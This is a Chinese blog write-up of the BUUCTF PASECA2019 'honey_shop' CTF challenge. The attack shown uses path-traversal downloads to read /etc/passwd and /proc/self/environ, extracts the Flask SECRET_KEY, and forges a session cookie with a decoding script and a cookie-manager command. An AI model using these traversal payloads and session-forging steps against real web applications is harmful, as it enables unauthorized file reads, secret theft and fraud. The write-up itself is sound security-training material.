BUUCTF [PASECA2019] honey_shop

最新推荐文章于 2024-04-27 09:35:46 发布
最新推荐文章于 2024-04-27 09:35:46 发布
阅读量1.5k 收藏 8
点赞数 1
分类专栏: BUUCTF WEB Writeup 文章标签: BUUCTF PASECA2019 honey_shop writeup CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/111469361
版权

BUUCTF [PASECA2019] honey_shop

考点:

  1. Flask中的Session伪造
  2. /environ记录当前进程的环境变量信息
  3. /proc/self其路径指向当前进程

启动环境:
在这里插入图片描述
是一个蜂蜜商店的界面,有1366美金,想要购买flag需要1337美金:
在这里插入图片描述
直接购买提示金额不足:
在这里插入图片描述
猜测可能是传参时存在金额参数或者cookie中,使用BurpSuite抓取数据包:
在这里插入图片描述
其中item应该为商品序号,获取到其中的session

session=eyJiYWxhbmNlIjoxMzM2LCJwdXJjaGFzZXMiOltdfQ.X-AP4Q.H4cz1rTUdylFbcil9brUNQuyDFI

使用Python脚本解密session

import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode


def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                        'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload')

    return session_json_serializer.loads(payload)


if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

在这里插入图片描述
获得解密后的值:

{'balance': 1336, 'purchases': []}

其中balance应该为当前余额,purchases值为空

首先想到的是伪造session,修改余额,所以需要SECRET_KEY的值
尝试了没有报错点,这时候发现了一句提示:
在这里插入图片描述

*click to download our sweet images*

可以点击下载图片:
在这里插入图片描述
其下载地址可能存在任意文件下载漏洞:

/download?image=3.jpg

使用BurpSuite抓取数据包:
在这里插入图片描述
修改其image的值为:

/download?image=../../../../../../../etc/passwd

发送数据包,得到/etc/passwd文件内容:
在这里插入图片描述
可以成功执行,尝试访问Python环境变量:

/proc/self
// 其路径指向当前进程

/environ
// 记录当前进程的环境变量信息

当路径为../../proc/self/environ时,得到回显:
在这里插入图片描述
得到了SECRET_KEY的值为:paZgTFQpDx10dFWGD8plBlHMJfusFaelmpM3BG4m

使用flask-session-cookie加密脚本Github地址

python3 flask_session_cookie_manager3.py encode -s "paZgTFQpDx10dFWGD8plBlHMJfusFaelmpM3BG4m" -t "{'balance': 1338, 'purchases': []}"

在这里插入图片描述
使用BurpSuite在购买flag时修改session的值发送数据包:
在这里插入图片描述
得到flag

Senimo_
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pasecactf_2019_web_honey_shop
05-04
PASECA2019_Web_honey_shop 题目详情 PASECA CTF 2019 Web honey_shop Difficulty: Easy 考点 LFI Flask Cookie伪造 启动 docker-compose up -d open 题目说明 Flag位于app/flag.txt,Docker中位于/app/flag.txt。 每次启动镜像时都会随机生成Flask Cookie的SECRET_KEY。 版权 该题目复现环境尚未取得主办方及出题人相关授权,如果侵权,请联系本人删除()
BUUCTF--[PASECA2019]honey_shop
qq_46263951的博客
08-14 579
与大多数题相似,这里给出的金额无法是我们购买到flag 这类一般都与session有关,这里的session看着很眼熟,使用jwt解密 balance对应着我们的余额,很明显这里是伪造session,修改余额,所以需要SECRET_KEY的值 根据提示*click to download our sweet images*,我们下载第一张图片 修改其image的值为: /download?image=../../../../../../../etc/passwd 尝试访问Pytho...
探索Juice Shop CTF:一个开源的安全训练场
最新发布
gitblog_00019的博客
04-27 283
探索Juice Shop CTF:一个开源的安全训练场 项目地址:https://gitcode.com/juice-shop/juice-shop-ctf 项目简介 Juice Shop CTF 是一个基于 OWASP Juice Shop 的网络安全挑战平台。它旨在为安全专业人士、开发者和学生提供一个实战环境,学习和提高网络安全技能,特别是关于Web应用安全的知识。 技术分析 构建技术 Jui...
[PASECA2019]honey_shop
qq_63928796的博客
06-20 1139
打开题目是一个很好的购买页面下面可以发现我们需要的flag但是钱不够,所以我们要想办法修改金币,之后观察点击中间的图片可以下载先拦截一下发现image可以试试用这个方法去访问一下目录确实可以穿越目录下载passwd,但只得到一些没有的配置信息我们的目的是修改金钱,金钱的信息就存在session里所以想办法修改session就需要找SECRET_KEY去python的环境变量找一下发现SECRET_KEY就可以修改session python3 flask_session_cookie_manager3.py
rpi-boot-eeprom-recovery-2019-07-15_honey_program_
10-01
标题中的“rpi-boot-eeprom-recovery-2019-07-15_honey_program_”似乎指的是一个用于修复或更新Raspberry Pi(树莓派)启动EEPROM的程序,时间戳“2019-07-15”可能代表这个工具的创建或更新日期。"Honey program...
Honey_Project
02-14
为了深入学习Honey_Project,可以借助在线教程、书籍和开发工具。例如,MDN Web Docs提供了详尽的HTML参考文档,W3Schools提供互动式学习环境,而Visual Studio Code等编辑器内置了HTML语法高亮和自动补全功能,便于...
honey-v1.1_honey_WordPress_eleven24t_
10-01
我们的2020年默认主题旨在充分利用区块编辑器的灵活性。组织和企业可以使用群组和栏目区块创建具有无限布局的动态到达页面。居中的内容栏和经过微调的版式也使其非常适合传统博客。完整的编辑器样式使您即使在发布...
BUUCTF [PASECA2019]honey_shop
CyhDl666的博客
03-16 387
文件读取和session伪造 发现购买flag的钱差1元 其实大概就是这样,我们距离我们最想得到的就差那么一丢丢,买不了flag我们可以买蜂蜜嘛… 进入正题 题目有个提示click to download our sweet images 大概题目的切入点就是这个 下载的时候抓个包 发现/download?image=2.jpg,发现download目录,我们就可以尝试一下能不能去获取其他有用的信息 可以读取到其他有用的信息 昨天做题的时候做到了Linux下的一个文件 复习一下 Linux下.
xctf攻防世界honey_shop wp
sash1mi
01-15 844
访问题目地址 有1336元,但是要购买Flag需要1337元 注意到有一句“click to download our sweet images”,发现访问的是/download?image=1.jpg,这样就可能出现LFI 关于LFI:https://www.cnblogs.com/c1e4r/articles/7806819.html 试着读一下/proc的相关信息了,/proc/self/永远指向当前进程,尝试读一下environ文件,这记录着当前进程(本题而言是python)的环境变量信息 .
BUUCTF_练[PASECA2019]honey_shop
m0_66225311的博客
10-29 470
页面信息收集,根据下载的图片找到下载链接,确定`url`的参数进行利用;`session`字段的解密和解密,session伪造的考点。
PASECA2019_Web_honey_shop
snowlyzz的博客
08-30 204
bt
[pasecactf_2019]tornado_casino
m0_57291352的博客
08-29 632
[pasecactf_2019]tornado_casino 题目 from sys import argv from random import getrandbits flag = '<redacted>' tornado_banner = ''' 88 ,d
buuctf pasecactf_2019]flask_ssti
qq_40800734的博客
06-29 2437
1.测试存在ssti 2.获取类型所属的对象,后面显示被过滤了,看了大佬的文章_'.这三个被过滤了,但可以用十六进制绕过 3.寻找基类 4.寻找可用引用 {{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()}} 5.接下来就是开始一系列利用了(基础不是很好,后面的待填坑)一些大佬的方法: 自己的一些总结:使用[]好像可以自动补.号 以下是等价的
BUUCTF 35
qq_52431855的博客
03-02 430
知识点 ShopXO企业级免费开源商城系统的漏洞(参考链接) SSTI模板注入 模板注入的一些特性(常见的注入可以用下图的方法进行测试。) 35-1[GKCTF2020]老八小超市儿 做题思路 开始毫无头绪,寻找WP,发现利用shopxo已有的漏洞, 利用方法链接 http://www.nctry.com/1660.html 默认后台admin.php默认账号密码是admin和shopxo 成功进入后台 接下来就在应用中心里的应用商店找到主题,然后下载默认..
刷题(第二周)
qq_62046696的博客
03-06 534
感悟:代码审计的题的确非常需要耐心一个个看,所以做题应该静下心来,思路:找出可以利用的方法比如,include/file_get_contents等,然后找出__destruct起点一步步观察。这里的this->pool是我们可以控制的,所以找出一个恶意类中的 saveDeferred方法即可,最终找到了PhpArrayAdapter.php中的方法,这里虽然报错了,但还是返回了1/0我们输入的值,因为flask框架是基于python语言的,所以师傅们用的方法是#注释掉后面的,
Linux的/proc/self/学习
cjdgg的博客
08-23 7529
Linux的/proc/self/学习 最近做的[SWPU2019]Web3和[pasecactf_2019]flask_ssti好像都涉及到了/proc这个目录,所以找篇文章来学习下,看了这篇文章才发现作者是搬运之前我就关注的一个大佬WHOAMI的文章,之前复现漏洞看的就是大佬的文章,这会回去看才发现大佬的博客好像关了,这也让我下定决心要把自己所学的东西记录下来,就算是搬运也要自己记录下来,一昧的收藏文章哪天大佬们把博客关了那就真的GG了。话不多说进入正题 /proc目录 Linux 内核提供了一种通过
honeywell_pks系统维护手册
12-09
Honeywell_PKS系统维护手册是一本详细介绍如何维护和管理该系统的指南。它包括了系统的基本原理、应用场景、维护流程、故障排查和修复方法等内容。 在维护手册中,首先会介绍Honeywell_PKS系统的基本原理和架构,让用户全面了解系统的工作原理和组成结构,为后续的维护工作打下基础。然后会详细介绍系统的维护流程,包括常规维护、定期检查和故障处理等内容,确保系统的稳定性和可靠性。 此外,维护手册还会提供故障排查和修复的方法,针对常见的故障情况给出解决方案,帮助用户快速恢复系统的正常运行。同时,还会介绍系统的安全维护和数据备份方法,确保系统数据的完整和安全。 维护手册还会包括系统的升级和优化内容,介绍新版本的功能和改进,指导用户如何进行系统的升级和优化,以提升系统的性能和功能。 总的来说,Honeywell_PKS系统维护手册是一本全面的指南,为用户提供了系统维护和管理的全面信息和方法,帮助用户更好地使用和维护这一高级控制系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值